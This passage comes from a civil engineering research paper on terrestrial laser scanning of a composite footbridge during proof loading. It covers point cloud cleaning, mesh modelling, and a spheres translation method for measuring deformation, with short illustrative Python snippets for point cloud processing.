The approximated surface model, presumably of the bottom of the lower vault, was the focal point of consideration. They calculated the surface difference by comparing the two epoch surfaces, but they did not mention the exact point cloud processing method that allows calculation of their results. There are a few works which present field case studies of bridge evaluation with TLS. Kitratporn et al. presented an evaluation of a suspension bridge in Myanmar \[[@B6-sensors-18-04332]\]. To measure the steel tower inclination, they extracted the planar surface using the RANSAC (see [Appendix A](#app1-sensors-18-04332){ref-type="app"}, [Table A1](#sensors-18-04332-t0A1){ref-type="table"}) algorithm \[[@B7-sensors-18-04332]\] and took the average vertical coordinate value of the points on the extracted plane in 1.5 m increments. Zogg et al. used terrestrial laser scanning for deformation monitoring on the Felsenau Viaduct in Switzerland during load tests \[[@B7-sensors-18-04332]\]. They obtained the difference between point clouds by calculating residuals as the shortest distances from the scan points to the reference surface, which was generated by triangulation.

2. Materials and Methods {#sec2-sensors-18-04332}
========================

2.1. Composite Bridge Description and Experiment Set-Up {#sec2dot1-sensors-18-04332}
-------------------------------------------------------

Composites compete with standard materials like concrete, steel, or wood. Composites are primarily much lighter than conventional materials and do not corrode, which is crucial for constructions exposed to an aggressive environment. In the considered bridge, the spans have a sandwich-type support structure. The core is foam, and the skins are built from laminated fiber-reinforced polymer, forming sandwich panels. The sandwich panel skins and lips are made from a flame-retardant vinyl-ester resin as the matrix and E-glass fabrics as the reinforcement. The polyethylene terephthalate foam core of the sandwich panel has a thickness of 100 mm and a density of 100 kg/m^3^. Due to significant local actions, which cannot be sustained by foam, the core in the support area consists of fiber-reinforced polymer. In the longitudinal and transverse directions, the bridge has chopped-strand ribs inside the core. The total mass of the footbridge superstructure is 3200 kg. The bridge has a low-elevation pseudo-arch, simply supported by the span of a U-shape channel section with auxiliary lips. The bridge was designed to meet specific parameters, such as the weight, the bearing capacity and the conditions needed to achieve it, comfort of use, attractive architectural design, durability, non-flammability, weather resistance, UV radiation resistance, chemical and electrical insulation, ease of assembly and disassembly, and easy repair and maintenance. The composite bridge span is a unique construction made entirely as one piece. The manufacturing method involves vacuum resin impregnation, and thanks to the infusion process, color, texture, and decorative elements can be included, which does not exclude subsequent surface painting. The bridge was devised and assembled within the "FOBRIDGE" project (Gdansk University of Technology: project leader; Warsaw Military University of Technology; Roma Private Limited Company: footbridge manufacturer). More information about the project can be found in the references \[[@B8-sensors-18-04332],[@B9-sensors-18-04332]\].
The image of the bridge, along with the schematic cross-section and side view, are shown in [Figure 1](#sensors-18-04332-f001){ref-type="fig"} and [Figure 2](#sensors-18-04332-f002){ref-type="fig"}a,b, respectively. The experimental set-up was in the middle of the span, two meters from the center of the bridge diaphragm. The scheme of the measurement station is shown in [Figure 3](#sensors-18-04332-f003){ref-type="fig"}. The position of the scanner is fixed, as shown in [Figure 4](#sensors-18-04332-f004){ref-type="fig"}. 2.2. Measurements and Point Cloud Processing {#sec2dot2-sensors-18-04332} -------------------------------------------- This chapter describes measurements, point cloud processing, mesh modeling methods, and change detection methods essential for qualitative deformation assessment. We performed scans at point zero, before proof loading and during the proof loading of the composite bridge. The proof loading consists of loading the deck with given load combinations and observing the deformation of the object. We make a scan with every change of the load combination. Due to difficult measuring conditions, especially the large research group that were simultaneously conducting other tests, partially covering the object while the device was sending a laser beam, we performed the TLS measurement multiple times for some load increments. We used a ScanStation C10 scanner, manufactured by Leica Geosystems AG (Heerbrugg, Switzerland). ### 2.2.1. Pre-Processing of the Point Cloud {#sec2dot2dot1-sensors-18-04332} We must process obtained point cloud samples in a certain way before the analysis. Most of the studies which focus on the processing of the point cloud mention three general steps: data sampling, noise reduction, and shadow filling. Data sampling helps to reduce the input redundancy, and its roots can be traced to clustering by Schreiber \[[@B10-sensors-18-04332]\] and Thinning algorithms by Floater et al. \[[@B11-sensors-18-04332]\]. Hou et al. \[[@B12-sensors-18-04332]\] presented an entirely new approach where sampling is carried out by a virtual adaptive process. One of the excellent works on automation of noise reduction is by Fua et al. \[[@B13-sensors-18-04332]\], in which the authors use it for the unstructured point cloud. There are many approaches to noise reduction, such as in Rusu et al.'s work \[[@B14-sensors-18-04332]\], where the authors proposed using a sophisticated algorithm which consists of filtering the point cloud, removing outliers, and returning the linear indices to the points that are either inliers or outliers. This method eliminates noise and resamples the data without deleting the essential details. The shadow filling can be handled by performing additional scans, but there is a method that uses volumetric diffusion, developed by Davis et al. \[[@B15-sensors-18-04332]\]. Raw point cloud data obtained directly after the measurements has to be processed with cleaning tools, and this so-called cleaning involves deleting redundant areas in the point cloud. Excessive regions of the point cloud contain data which do not directly refer to the considered scanned object, such as people, terrain, and trees, as in [Figure 5](#sensors-18-04332-f005){ref-type="fig"}a. We used the manual fencing procedure. The first step is to select an excessive part of the point cloud using a rectangular field, and then to remove everything in this field. The method is usually repeated a few times, as in [Figure 5](#sensors-18-04332-f005){ref-type="fig"}b. 
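As a concrete illustration of the automated noise-reduction step surveyed above (in the spirit of Rusu et al.), the sketch below flags statistical outliers by their mean distance to the k nearest neighbours. It is only a minimal, hedged example in Python/NumPy, not the tool actually used here; in this study the cleaning was done by manual fencing in the scanner software, and the neighbour count and threshold below are assumptions.

```python
import numpy as np
from scipy.spatial import cKDTree

def statistical_outlier_filter(points, k=8, std_ratio=2.0):
    """Rusu-style statistical outlier removal.

    points    : (N, 3) array of XYZ coordinates
    k         : number of neighbours used for the local mean distance
    std_ratio : how many standard deviations above the global mean
                distance a point may lie before it is flagged as noise
    returns   : boolean mask of inlier points
    """
    tree = cKDTree(points)
    # distances to the k nearest neighbours (column 0 is the point itself)
    dists, _ = tree.query(points, k=k + 1)
    mean_d = dists[:, 1:].mean(axis=1)
    threshold = mean_d.mean() + std_ratio * mean_d.std()
    return mean_d < threshold

# usage with a synthetic stand-in for a scan
cloud = np.random.rand(10000, 3)
clean_cloud = cloud[statistical_outlier_filter(cloud)]
```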
The result of the cleaning process is a point cloud representing only the considered object, as in [Figure 5](#sensors-18-04332-f005){ref-type="fig"}c. Due to various additional measurements that were carried out during proof loading, the lateral surface of the bridge was often obscured by the people crossing the view line between the bridge span and the scanner device. Obstacles between the bridge and a scanner caused the formation of rifts in the point cloud, so-called shadows, as shown in [Figure 6](#sensors-18-04332-f006){ref-type="fig"}a. These may result in an unstable distribution of points in the point cloud. We predicted the occurrence of such a situation, which is why we made several scans for each load case change. Points acquired in additional scans were used to fill the rift, as shown in [Figure 6](#sensors-18-04332-f006){ref-type="fig"}b. We merged the additional scans by allocating them in the same model space, as a given load case original scan. It is worth emphasizing once again that the position of the scanner was fixed during additional scans, as well as during the entire proof loading process. Effects of the unevenly distributed point cloud may be visible in the form of local congestion and rarefaction of points in the cloud. Point cloud optimization may help to improve redistribution of points in the cloud, but due to the precise nature of the analysis, the authors decided not to interfere with the structure of the points in order to reflect, as closely as possible, the actual state of the deformation in time. ### 2.2.2. Post-Processing of the Point Cloud {#sec2dot2dot2-sensors-18-04332} Mesh Generation There are many methods for mesh modeling of point clouds, and this issue is constantly being developed. The first algorithms which referred to mesh modeling of the point cloud were created by Boissonnat et al. in the mid-1980s \[[@B16-sensors-18-04332],[@B17-sensors-18-04332]\], but were practically not developed further by the scientific community until the beginning of the 1990s, when Hoppe et al. published extensive work about surface reconstruction of the unprocessed point cloud \[[@B18-sensors-18-04332]\]. Intensive work on this issue at the end of the nineties and later resulted in the emergence of a large number of new algorithms, but also a division into two main trends. The first trend focused on the methods where the zero-set of a scalar 3D function estimated the mesh surface \[[@B19-sensors-18-04332],[@B20-sensors-18-04332],[@B21-sensors-18-04332],[@B22-sensors-18-04332]\], and another group used the Delaunay complex to rough mesh surface by its subcomplex \[[@B23-sensors-18-04332],[@B24-sensors-18-04332],[@B25-sensors-18-04332],[@B26-sensors-18-04332],[@B27-sensors-18-04332],[@B28-sensors-18-04332],[@B29-sensors-18-04332],[@B30-sensors-18-04332],[@B31-sensors-18-04332]\]. Modern meshing algorithms mostly perform construction of the Delaunay complex in an incremental manner, and to improve data locality optimize the insertion order by spatial sorting techniques \[[@B32-sensors-18-04332],[@B33-sensors-18-04332],[@B34-sensors-18-04332]\]. A good example of the further development of these algorithms is the use of three point-insertion sequences for incremental Delaunay tessellations performed by Gonzaga et al. \[[@B34-sensors-18-04332]\]. After the pre-processing stage, each point cloud was exported in PTX format with its intensity map for further processing in "MeshLAB" and "CloudCompare". 
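To make the Delaunay-based family of meshing methods mentioned above more tangible, the following sketch triangulates an almost planar patch (such as the diaphragm's lateral surface) by projecting the points onto their best-fit plane and running a 2D Delaunay triangulation. This is an illustrative simplification, not the meshing routine of MeshLAB or CloudCompare, and the synthetic patch dimensions are assumptions.

```python
import numpy as np
from scipy.spatial import Delaunay

def triangulate_near_planar_patch(points):
    """2.5D meshing of an almost planar patch:
    project onto the best-fit plane, then triangulate in 2D."""
    centroid = points.mean(axis=0)
    # principal in-plane directions from the SVD of the centred cloud
    _, _, vt = np.linalg.svd(points - centroid, full_matrices=False)
    basis = vt[:2]                       # two in-plane axes
    uv = (points - centroid) @ basis.T   # 2D parametrisation
    return Delaunay(uv).simplices        # (n_triangles, 3) vertex indices

# synthetic, roughly planar patch standing in for a scanned surface
pts = np.random.rand(500, 3) * np.array([10.0, 2.0, 0.05])
triangles = triangulate_near_planar_patch(pts)
print(triangles.shape)
```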
The software uses an algorithm which connects every spatial point with its nearest surrounding points and builds a triangle grid to create a mesh model for every state in time, as shown in [Figure 7](#sensors-18-04332-f007){ref-type="fig"}a. Several mesh models were prepared, including models covered with intensity maps, as in [Figure 7](#sensors-18-04332-f007){ref-type="fig"}b,c.

How to Detect Deformations in the Point Cloud

It is necessary to compare the reference scan and the scan from a given load case to determine the deformation state of the bridge. There are two groups of point cloud processing methods for change analysis: region-based and point-based. One of the first approaches to TLS data change detection was proposed by Girardeau-Montaut et al. \[[@B35-sensors-18-04332]\] and focused on the direct comparison of point clouds by an average distance, best fitting plane orientation, and the maximum distance from the points in one set to the closest point in the other set, the so-called Pompeiu--Hausdorff distance. Girardeau-Montaut et al. showed that among these three parameters, the third one gives the best validation. Lindenbergh and Pfeifer \[[@B36-sensors-18-04332]\] presented a solution to detect deformation using an analysis based on the point-to-plane approach, in which points and fitted planes are compared between consecutive epochs. Comparison with the use of range segmentation was presented by Zeibak and Filin \[[@B37-sensors-18-04332]\], who tried to overcome two main issues of TLS data: occlusion and spatial sampling. The method based on point-to-point measurement of the Pompeiu--Hausdorff distance was proposed by Kang et al. \[[@B38-sensors-18-04332]\], and the authors pointed out that point-to-point is sensitive to local point density, tending to make the point-to-plane approach more reliable. Zhang et al. \[[@B39-sensors-18-04332]\] detected a spatial change using an anisotropic-weighted ICP (A-ICP) (see [Appendix A](#app1-sensors-18-04332){ref-type="app"}, [Table A1](#sensors-18-04332-t0A1){ref-type="table"}) algorithm, and also presented how to model the random error. The authors were able to estimate the synthetic surface ruptures. Ziolkowski et al. \[[@B40-sensors-18-04332],[@B41-sensors-18-04332]\] proposed to study the change of the scanned object in time by tracking the positions of the projections of physical characteristic objects. The authors used this method to study the deformations of a concrete element under monotonic loading.

3. Results: Analysis of Shape Deformation {#sec3-sensors-18-04332}
=========================================

3.1. Deformation of Bridge Diaphragm during Proof Loading {#sec3dot1-sensors-18-04332}
---------------------------------------------------------

Deformation of the bridge diaphragm is particularly crucial for the overall bearing capacity of the bridge. The lateral surface of the bridge diaphragm deformed irregularly, making it difficult to obtain a complete image of the deformation with standard measurement methods. The general modal states are the best illustration of the various deformation states \[[@B9-sensors-18-04332]\], shown in [Figure 8](#sensors-18-04332-f008){ref-type="fig"}. We propose a general framework for deformation analysis: the block diagram presented in [Figure 9](#sensors-18-04332-f009){ref-type="fig"}. The solution consists of three stages: change detection, determination of the general deformation trend, and precise determination of deformations in specified areas.
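The change-detection stage described next builds on the point-to-point comparisons reviewed above. As a minimal, hedged sketch (not the exact computation performed by the cited software), the nearest-neighbour distances from one epoch to another already yield the average change and a one-sided Pompeiu-Hausdorff distance:

```python
import numpy as np
from scipy.spatial import cKDTree

def cloud_to_cloud_metrics(reference, compared):
    """Point-to-point comparison of two epochs.

    reference, compared : (N, 3) and (M, 3) arrays of XYZ points
    returns             : summary statistics of the nearest-neighbour distances
    """
    tree = cKDTree(reference)
    d, _ = tree.query(compared, k=1)               # distance to closest reference point
    return {
        "mean_distance": float(d.mean()),           # average change
        "hausdorff_one_sided": float(d.max()),      # max-of-min distance
        "p95_distance": float(np.percentile(d, 95)) # robust alternative to the maximum
    }

# synthetic stand-ins: epoch 1 is epoch 0 shifted vertically by 1 mm
scan0 = np.random.rand(20000, 3)
scan1 = scan0 + np.array([0.0, 0.0, 0.001])
print(cloud_to_cloud_metrics(scan0, scan1))
```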
3.2. Change Detection {#sec3dot2-sensors-18-04332}
---------------------

### 3.2.1. Rotation of the Bridge Diaphragm {#sec3dot2dot1-sensors-18-04332}

To determine if a deformation exists, we check whether a change has occurred between the scans taken before and after applying the load. In the case of the considered composite foot-bridge, deformation of the lateral surface of the diaphragm is particularly important. The diaphragm rotation between two states in time is a simple value, which can be used to estimate whether a change occurred. However, such a considerable simplification loses details of local deformations, so the tool should be used with caution. The method consists of the creation of two mesh models generated by special kinds of algorithms, called FM (Fast Marching) and KD-Tree. Mesh models, as previously noted, are projections of the bridge diaphragm for two states in time. In the considered case, we used the FM algorithm because it needs fewer parameters and is easier to implement. However, KD-Tree is an excellent alternative to FM.

### 3.2.2. FM (Fast Marching) and KD-Tree Algorithms in the Building of the Mesh Model {#sec3dot2dot2-sensors-18-04332}

The FM algorithm divides the initial point cloud into smaller patches and regroups them with systematic subdivision, which is not recursive. Afterward, most of the pieces will be the same size, but have different surface curvature due to the set resolution. Next is the fusion process, which is based on FM front propagation. The algorithm requires two input parameters: the grid resolution, expressed as the subdivision level of the cloud octree, and the accuracy level, which is achieved by re-computation of the facet retro-projection error. We can use an octree for a faster initialization. Another algorithm which is also satisfactory for mesh generation is the KD-Tree algorithm. The algorithm recursively divides the point cloud into small patches of planar shape, which are then regrouped into larger facets. The method needs several input values, which are as follows: the maximum angle between neighboring patches, the maximum relative distance from the current facet center, and the maximum distance between patches that should be merged. The critical differences between the KD-Tree and FM algorithms are as follows: The subdivision is systematic in FM and not recursive as in KD-Tree. The FM fusion process is based on front propagation. KD-Tree represents a disjoint partition. We decided to use FM because it needs fewer parameters and is easier to implement.

### 3.2.3. Actual Rotation of the Bridge Diaphragm {#sec3dot2dot3-sensors-18-04332}

We calculate the actual rotation of the bridge diaphragm using two mesh projections of the bridge in time, before and after the applied load. Meshes for both states in time were generated by the FM algorithm, with the parameters needed to create the estimated facet (shown in [Figure 10](#sensors-18-04332-f010){ref-type="fig"}a,b). We present the rotation by the surface centers and normal vectors, as shown in [Table 1](#sensors-18-04332-t001){ref-type="table"}. This rough simplification allows estimation of whether a change in the element position occurred. The conclusion was that, due to the rotation, the upper part of the lateral surface moved in the perpendicular direction, in contrast to the bottom portion of the plate. The rotation is clearly visible in [Figure 10](#sensors-18-04332-f010){ref-type="fig"}b.
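The rotation reported in Table 1 can be reduced to a single angle between the facet normals of the two epochs. A minimal sketch follows; the numerical values are simply those listed in Table 1, and the rounded result in the comment is an estimate.

```python
import numpy as np

def angle_between_normals(n1, n2):
    """Angle, in degrees, between two facet normal vectors."""
    n1 = np.asarray(n1, dtype=float)
    n2 = np.asarray(n2, dtype=float)
    cos_a = np.dot(n1, n2) / (np.linalg.norm(n1) * np.linalg.norm(n2))
    return np.degrees(np.arccos(np.clip(cos_a, -1.0, 1.0)))

# facet normal vectors for the two epochs, as listed in Table 1
n_epoch1 = [0.835015, -0.544994, -0.075702]
n_epoch2 = [0.835581, -0.546797, -0.053072]
print(angle_between_normals(n_epoch1, n_epoch2))   # roughly 1.3 degrees
```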
3.3. Determination of the General Deformation Trend {#sec3dot3-sensors-18-04332}
---------------------------------------------------

Once we had found that a change occurred, we were able to assess the general deformation trends. This should tell us which part of the bridge is the most deformed and on which area we should focus for precise calculation. In this subsection, the authors show what the visual assessment of the bridge diaphragm mesh models looks like at two points in time. Selected projections of the bridge at two points in time were placed in one coordinate system and superimposed on each other. The procedure requires a fixed coordinate system. By visually analyzing the first image of [Table 2](#sensors-18-04332-t002){ref-type="table"}-1, it can be seen that these two scans do not coincide in a consistent, systematic manner. The support and bottom area of the composite bridge span have a uniformly interpenetrating grid structure, as seen in [Table 2](#sensors-18-04332-t002){ref-type="table"}-2. In [Table 2](#sensors-18-04332-t002){ref-type="table"}-3 patches of different colors permeate each other, which indicates that no deformation has occurred. However, the middle and upper part of the span do not have the same appearance. The two meshes do not overlap, and the color of only one grid is visible, as shown in [Table 2](#sensors-18-04332-t002){ref-type="table"}-4. In [Table 2](#sensors-18-04332-t002){ref-type="table"}-5, the authors managed to capture the curve along which the object leans away from the plane of the bridge diaphragm's lateral surface with increasing deformation, as well as the rotation of the diaphragm lip in [Table 2](#sensors-18-04332-t002){ref-type="table"}-7. More detailed observations of the bridge diaphragm deformation are in [Table 2](#sensors-18-04332-t002){ref-type="table"}. This part of the analysis should reveal the deformation trends and indicate the areas on which we should focus during the exact calculation of the deformation in the next part of the study.

3.4. Spheres Translation Method (STM) {#sec3dot4-sensors-18-04332}
-------------------------------------

### 3.4.1. Application of the Spheres Translation Method {#sec3dot4dot1-sensors-18-04332}

To accurately measure the deformations of the lateral surface of the bridge diaphragm, we adapted and used the spheres translation method. The spheres translation method (STM) is one of the point cloud processing procedures, alongside such methods as the point-to-point, point-to-surface, or surface-to-surface methods. The spheres translation method (STM) procedure consists of several steps. The first step is the placement of special tags (e.g., round plates) on the object. Then, during the measurements, we scan the tags along with the entire structure. In post-processing, we fit spheres to the points that represent these tags in the point cloud. Then, we track changes in their position over time. Positional deviations of the spheres indicate the direction of deformation. In other words, it comes down to the selection of characteristic points, which represent the tags on the surface of the object, partially shown in [Figure 11](#sensors-18-04332-f011){ref-type="fig"}d. A virtual mesh sphere is fitted to these points, and its translation is tracked in time. This method has several boundary conditions, the most important of which is a fixed coordinate system, common to subsequent measurements. The uniform coordinate system was obtained by performing all measurements from a fixed scanner position.
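Fitting the virtual sphere to the tag points is typically done with a simple algebraic least-squares fit. The sketch below is a hedged illustration of that step, not the routine used in the scanner software; the tag geometry, noise level, and sphere position are assumptions.

```python
import numpy as np

def fit_sphere(points):
    """Algebraic least-squares sphere fit.

    Uses |p|^2 = 2*c.p + (r^2 - |c|^2), which is linear in the centre c
    and the constant term, so it can be solved with ordinary least squares.
    """
    A = np.hstack([2.0 * points, np.ones((len(points), 1))])
    b = (points ** 2).sum(axis=1)
    sol, *_ = np.linalg.lstsq(A, b, rcond=None)
    centre = sol[:3]
    radius = np.sqrt(sol[3] + centre @ centre)
    return centre, radius

# synthetic tag: noisy points on a 5 cm sphere at an assumed position
rng = np.random.default_rng(0)
directions = rng.normal(size=(300, 3))
directions /= np.linalg.norm(directions, axis=1, keepdims=True)
true_centre = np.array([-1.76, 1.94, 0.05])
pts = true_centre + 0.05 * directions + rng.normal(scale=0.001, size=(300, 3))
centre, radius = fit_sphere(pts)
print(centre, radius)   # recovers the centre to sub-millimetre accuracy
```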
We made a "zero" scan before applying the load, which was the reference scan. We identified differences in the position of the spheres as the displacement vector in a given direction. The displacement of the sphere is visible in [Figure 11](#sensors-18-04332-f011){ref-type="fig"}a--c. We present an example of the location change of the sphere SD_2 over time to illustrate the procedure. We distinguished the spheres marked as SD2_S1 and SD2_S2 by the colors green and red, respectively. The coordinates of both objects are in [Table 3](#sensors-18-04332-t003){ref-type="table"}. We determined coordinates in respect to the reference scan. The displacement is about 1 mm. We performed the proof loading (U1) in several steps, presented in [Table 4](#sensors-18-04332-t004){ref-type="table"}. The overall weight of the slabs in the U1 test was equal to 14,400 kg. Analysis using the spheres translation method (STM) was performed for various loads conducted in the following order: 1 + 2; 1 + 2 + 3; 1 + 2 + 3 + 4; 2 + 3 + 4; 3 + 4; 4. The bridge span was loaded and unloaded alternately. ### 3.4.2. Comparative Analysis {#sec3dot4dot2-sensors-18-04332} We prepared a comparative study of TLS results with those of the deflectometer and total station. Deflectometer inductive sensors were set at three points below the surface of the bridge span, distant from each other by 3.50 m, and were used to determine vertical displacements. We measured horizontal and vertical movements with the Leica Nova MS50 surveying station. We carried out the spheres translation method (STM) deformation measurements based on TLS data. To statistically describe the deformations of the composite bridge diaphragm lateral surface and enable comparative analysis with other methods, the authors decided to isolate three cross-sections for each analyzed load case, as shown in [Figure 12](#sensors-18-04332-f012){ref-type="fig"}. The profile position was based on the approximate position of spheres located in the closest vicinity of the cross-section. We calculated the displacements of the spheres by applying results from individual load cases to a reference sphere's position from the case before the load was applied. We present the deformations of the composite bridge diaphragm lateral surface in the perpendicular direction for different load cases in [Figure 13](#sensors-18-04332-f013){ref-type="fig"}a--f (STM in three sections compared with total station measurements), and the vertical displacements in [Figure 14](#sensors-18-04332-f014){ref-type="fig"}a--f (STM in three sections, total station measurements, and deflectometer). We show the data for individual areas of the composite bridge diaphragm lateral surface, which is divided along the length of the bridge into equal sections with lengths of 1.75 m. We decided to adopt the length of 1.75 m because this value corresponds to the placement of markers used for total station measurements. ### 3.4.3. Observations from the Comparative Analysis {#sec3dot4dot3-sensors-18-04332} By analyzing the research material presented in [Figure 13](#sensors-18-04332-f013){ref-type="fig"} and [Figure 14](#sensors-18-04332-f014){ref-type="fig"}, it can be concluded that there is a high convergence of results between the results of displacements obtained by TLS and the measurements from the total station and the deflectometer. A great advantage of TLS over the other measurement methods is a more comprehensive form of results. 
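Once the sphere centres are available for the reference scan and for a given load case, the STM displacement is simply the difference of the fitted centres, which is what the section profiles above are built from. A hedged sketch; the tag names and coordinates below are made up for illustration.

```python
import numpy as np

def sphere_displacements(reference_centres, loaded_centres):
    """Displacement vector of each tag between the reference scan and one load case.

    Both arguments map a tag id to its fitted (x, y, z) centre.
    """
    displacements = {}
    for tag, ref in reference_centres.items():
        if tag in loaded_centres:
            displacements[tag] = np.asarray(loaded_centres[tag]) - np.asarray(ref)
    return displacements

# illustrative centres; tag names and values are hypothetical
reference = {"S1_A": (-1.760, 1.940, 0.050), "S2_A": (0.010, 1.950, 0.050)}
load_case = {"S1_A": (-1.761, 1.941, 0.050), "S2_A": (0.010, 1.950, 0.048)}

for tag, vec in sphere_displacements(reference, load_case).items():
    print(tag, np.round(vec, 4))   # displacement components along the scanner's x, y, z axes
```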
The use of TLS and STM allows control of the deformations over the whole lateral surface of the bridge diaphragm.

4. Summary and Conclusions {#sec4-sensors-18-04332}
==========================

This paper presents a general framework for the deformation study of bridges, with particular attention to bridges that are subject to very irregular deformation, such as composite bridges. We propose a solution which combines rough change estimation, virtual visual inspection, and STM analysis, giving the advantages of both quick change estimation and precise deformation measurement. We describe the test set-up configuration, the procedure of pre-processing and post-processing of the point cloud data, and an extensive literature review of point cloud processing, mesh modeling, and change detection. We gathered point cloud data during the proof loading process from a fixed scanner position with a Leica ScanStation C10 terrestrial laser scanner. We performed the first scan before loading the bridge and further scans for the various load cases during proof loading. Our algorithm has three steps: The first step is to check if there has been a change in the considered object between the two points in time. We did a quick, rough assessment of whether a change occurred in the object by comparing two facets generated with the FM algorithm. Rotation of the facets between different points in time indicates the occurrence of a deformation. Once we know that a deformation exists, we can perform a virtual visual inspection of the bridge by superimposing two mesh models in one model space to see the nature of the distortion. Identifying the kind of deformation tells us which areas are worth focusing on during accurate measurements, such as STM analysis, since these are time-consuming. We presented how to efficiently perform a virtual visual inspection of the bridge for two points in time. The third step is taking accurate measurements using point cloud processing. We adapted the STM to perform a detailed analysis of the deformations and adjusted the method for field use. We modified the STM by analyzing the object in three sections, which helped to cover most of the bridge diaphragm surface. The method was designed for concrete element deformation under monotonic load in our previous studies \[[@B40-sensors-18-04332]\]. We compared the results from the STM with the results obtained using a total station and the deflectometer, and found they were similar. The advantage of the proposed method is a much broader insight into the deformation state of the object for different load cases in comparison with the total station and the deflectometer, which is especially significant in the examination of composite bridge diaphragms, as they deform irregularly in the direction perpendicular to the diaphragm lateral surface. Additionally, TLS measurements are much faster than those taken with the total station and the deflectometer. The downsides of this solution are its sensitivity to changes in the position of the scanner, weather conditions, point cloud density fluctuations, rifts in the point cloud, and improper scanning, as well as the need for laborious data processing. The issue of complex shape analysis for the composite structures presented in this paper is significant, and we would like to develop it further. Further work will include the development of procedures for large-scale bridges, as well as the improvement of existing methods.
The authors would like to express their gratitude to the Department of Mechanics of Materials and Structures for providing data and allowing them to participate in the proof loading process, as well as to the Department of Geodesy for sharing the Terrestrial Laser Scanner device. Both departments are part of the Faculty of Civil and Environmental Engineering at the Gdansk University of Technology.

Conceptualization, P.Z.; Methodology, P.Z.; Software, P.Z.; Validation, P.Z. and J.S.; Formal Analysis, P.Z. and J.S.; Investigation, P.Z. and J.S.; Resources, J.S. and M.M.; Data Curation, P.Z. and J.S.; Writing-Original Draft Preparation, P.Z.; Writing-Review & Editing, P.Z.; Visualization, P.Z.; Supervision, P.Z.; Project Administration, P.Z.; Funding Acquisition, M.M.

The bridge tests refer to the project supported by the National Centre for Research and Development, Poland, grant no. PBS1/B2/6/2013, and statutory research of the Department of Concrete Structures and the Department of Geodesy, FCEE GUT, financed by the Ministry of Science and Higher Education of Poland.

The authors declare no conflict of interest.

We listed the acronyms used in the paper in [Table A1](#sensors-18-04332-t0A1){ref-type="table"}.

sensors-18-04332-t0A1_Table A1

###### List of acronyms used in the paper.

  No.   Acronym   Description
  ----- --------- --------------------------------
  1     FM        Fast Marching algorithm
  2     ICP       Iterative Closest Point
  3     KD-Tree   KD-Tree algorithm
  4     RANSAC    RANdom SAmple Consensus
  5     STM       Spheres Translation Method
  6     TIN       Triangulated Irregular Network
  7     TLS       Terrestrial Laser Scanning

![Composite bridge.](sensors-18-04332-g001){#sensors-18-04332-f001}

![Composite bridge cross-section (**a**) and side view (**b**) with dimensions.](sensors-18-04332-g002){#sensors-18-04332-f002}

![Experimental set-up scheme.](sensors-18-04332-g003){#sensors-18-04332-f003}

![Fixed scanner position: the arrow points out the location of the scanner.](sensors-18-04332-g004){#sensors-18-04332-f004}

![The images show a view of the point cloud in the following phases: (**a**) before pre-processing; (**b**) fenced area for deletion; and (**c**) after pre-processing.](sensors-18-04332-g005){#sensors-18-04332-f005}

![Images refer to point cloud structural processing: (**a**) so-called shadow as a breach in the point cloud; and (**b**) filling the "shadow" with points acquired in additional scans.](sensors-18-04332-g006){#sensors-18-04332-f006}

![Images refer to point cloud structural processing: (**a**) TIN situated on the point cloud, (**b**,**c**) and the intensity map imposed on a TIN (see [Appendix A](#app1-sensors-18-04332){ref-type="app"}, [Table A1](#sensors-18-04332-t0A1){ref-type="table"}) grid.](sensors-18-04332-g007){#sensors-18-04332-f007}

![General modal states of the composite bridge \[[@B9-sensors-18-04332]\].](sensors-18-04332-g008){#sensors-18-04332-f008}

![Block diagram of the proposed framework.](sensors-18-04332-g009){#sensors-18-04332-f009}

![Facets of the composite bridge diaphragm generated by the FM algorithm: (**a**) axonometry; and (**b**) side view.](sensors-18-04332-g010){#sensors-18-04332-f010}

![Spheres translation method: (**a**) mesh grid of the bridge diaphragm surface with displaced spheres; (**b**) mesh grid; (**c**) bridge diaphragm surface with displaced objects; and (**d**) flat signals on the bridge diaphragm surface.](sensors-18-04332-g011){#sensors-18-04332-f011}

![Three analyzed sections on the lateral surface of the bridge diaphragm.](sensors-18-04332-g012){#sensors-18-04332-f012}

###### Deformation of the bridge diaphragm
in the perpendicular direction during proof loading: STM in three sections and total station (mm); (**a**) Load U1: 1 + 2; (**b**) Load U1: 1 + 2 + 3; (**c**) Load U1: 1 + 2 + 3 + 4; (**d**) Load U1: 2 + 3 + 4; (**e**) Load U1: 3 + 4; and (**f**) Load U1: 4. ![](sensors-18-04332-g013a) ![](sensors-18-04332-g013b) ###### Displacement of the bridge diaphragm in the vertical direction during proof loading: STM in three sections + total station + deflectometer \[mm\]; (**a**) Load U1: 1 + 2; (**b**) Load U1: 1 + 2 + 3; (**c**) Load U1: 1 + 2 + 3 + 4; (**d**) Load U1: 2 + 3 + 4; (**e**) Load U1: 3 + 4; and (**f**) Load U1: 4. ![](sensors-18-04332-g014a) ![](sensors-18-04332-g014b) sensors-18-04332-t001_Table 1 ###### Mesh plane data from both points in time, after facet generation (m). Epoch X Coordinate Y Coordinate Z Coordinate ---------------- -------------- -------------- -------------- Surface center 1 --2.112770 1.403070 --0.054039 2 --2.132400 1.373320 --0.056683 Normal vector 1 0.835015 --0.544994 --0.075702 2 0.835581 --0.546797 --0.053072 sensors-18-04332-t002_Table 2 ###### Visual analysis of the 3D model changes that have occurred, along with the illustrations. No. Illustration and Description ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------- 1 ![](sensors-18-04332-i001.jpg) Both scans were superimposed on one another and formed into two interpenetrating mesh models. Using the compartments of two overlapped schemes, the state of change is visible in the course of a composite bridge span overloading. 2 ![](sensors-18-04332-i002.jpg) Bridge span support region, where it can be seen that two mesh models penetrate each other in a uniform manner, indicating that this place shifted after the proof loading process. 3 ![](sensors-18-04332-i003.jpg) Bridge span the middle-bottom region, where it is visible that the two mesh models interpenetrate in a homogenous way. This indicates that this place does not shift in the perpendicular direction, but it might be seen, by looking at signal placed to the bridge, that the surface has moved in the vertical direction by a small amount. 4 ![](sensors-18-04332-i004.jpg) Bridge span middle-bottom region, in which it is visible that the two mesh models do not interpenetrate, indicating that this place does not shift in the perpendicular direction. 5 ![](sensors-18-04332-i005.jpg) On the illustration above the mesh model corresponding to the more deformed state is presented in red color. The character of the deformation is visible. Displacement of the side surface has occurred with tilting in the perpendicular direction, determined by the three-dimensional polyline in a parabolic shape. The deformation silhouette may indicate a place where increased stresses start to occur. The elliptical shape of the polyline is puzzling. 
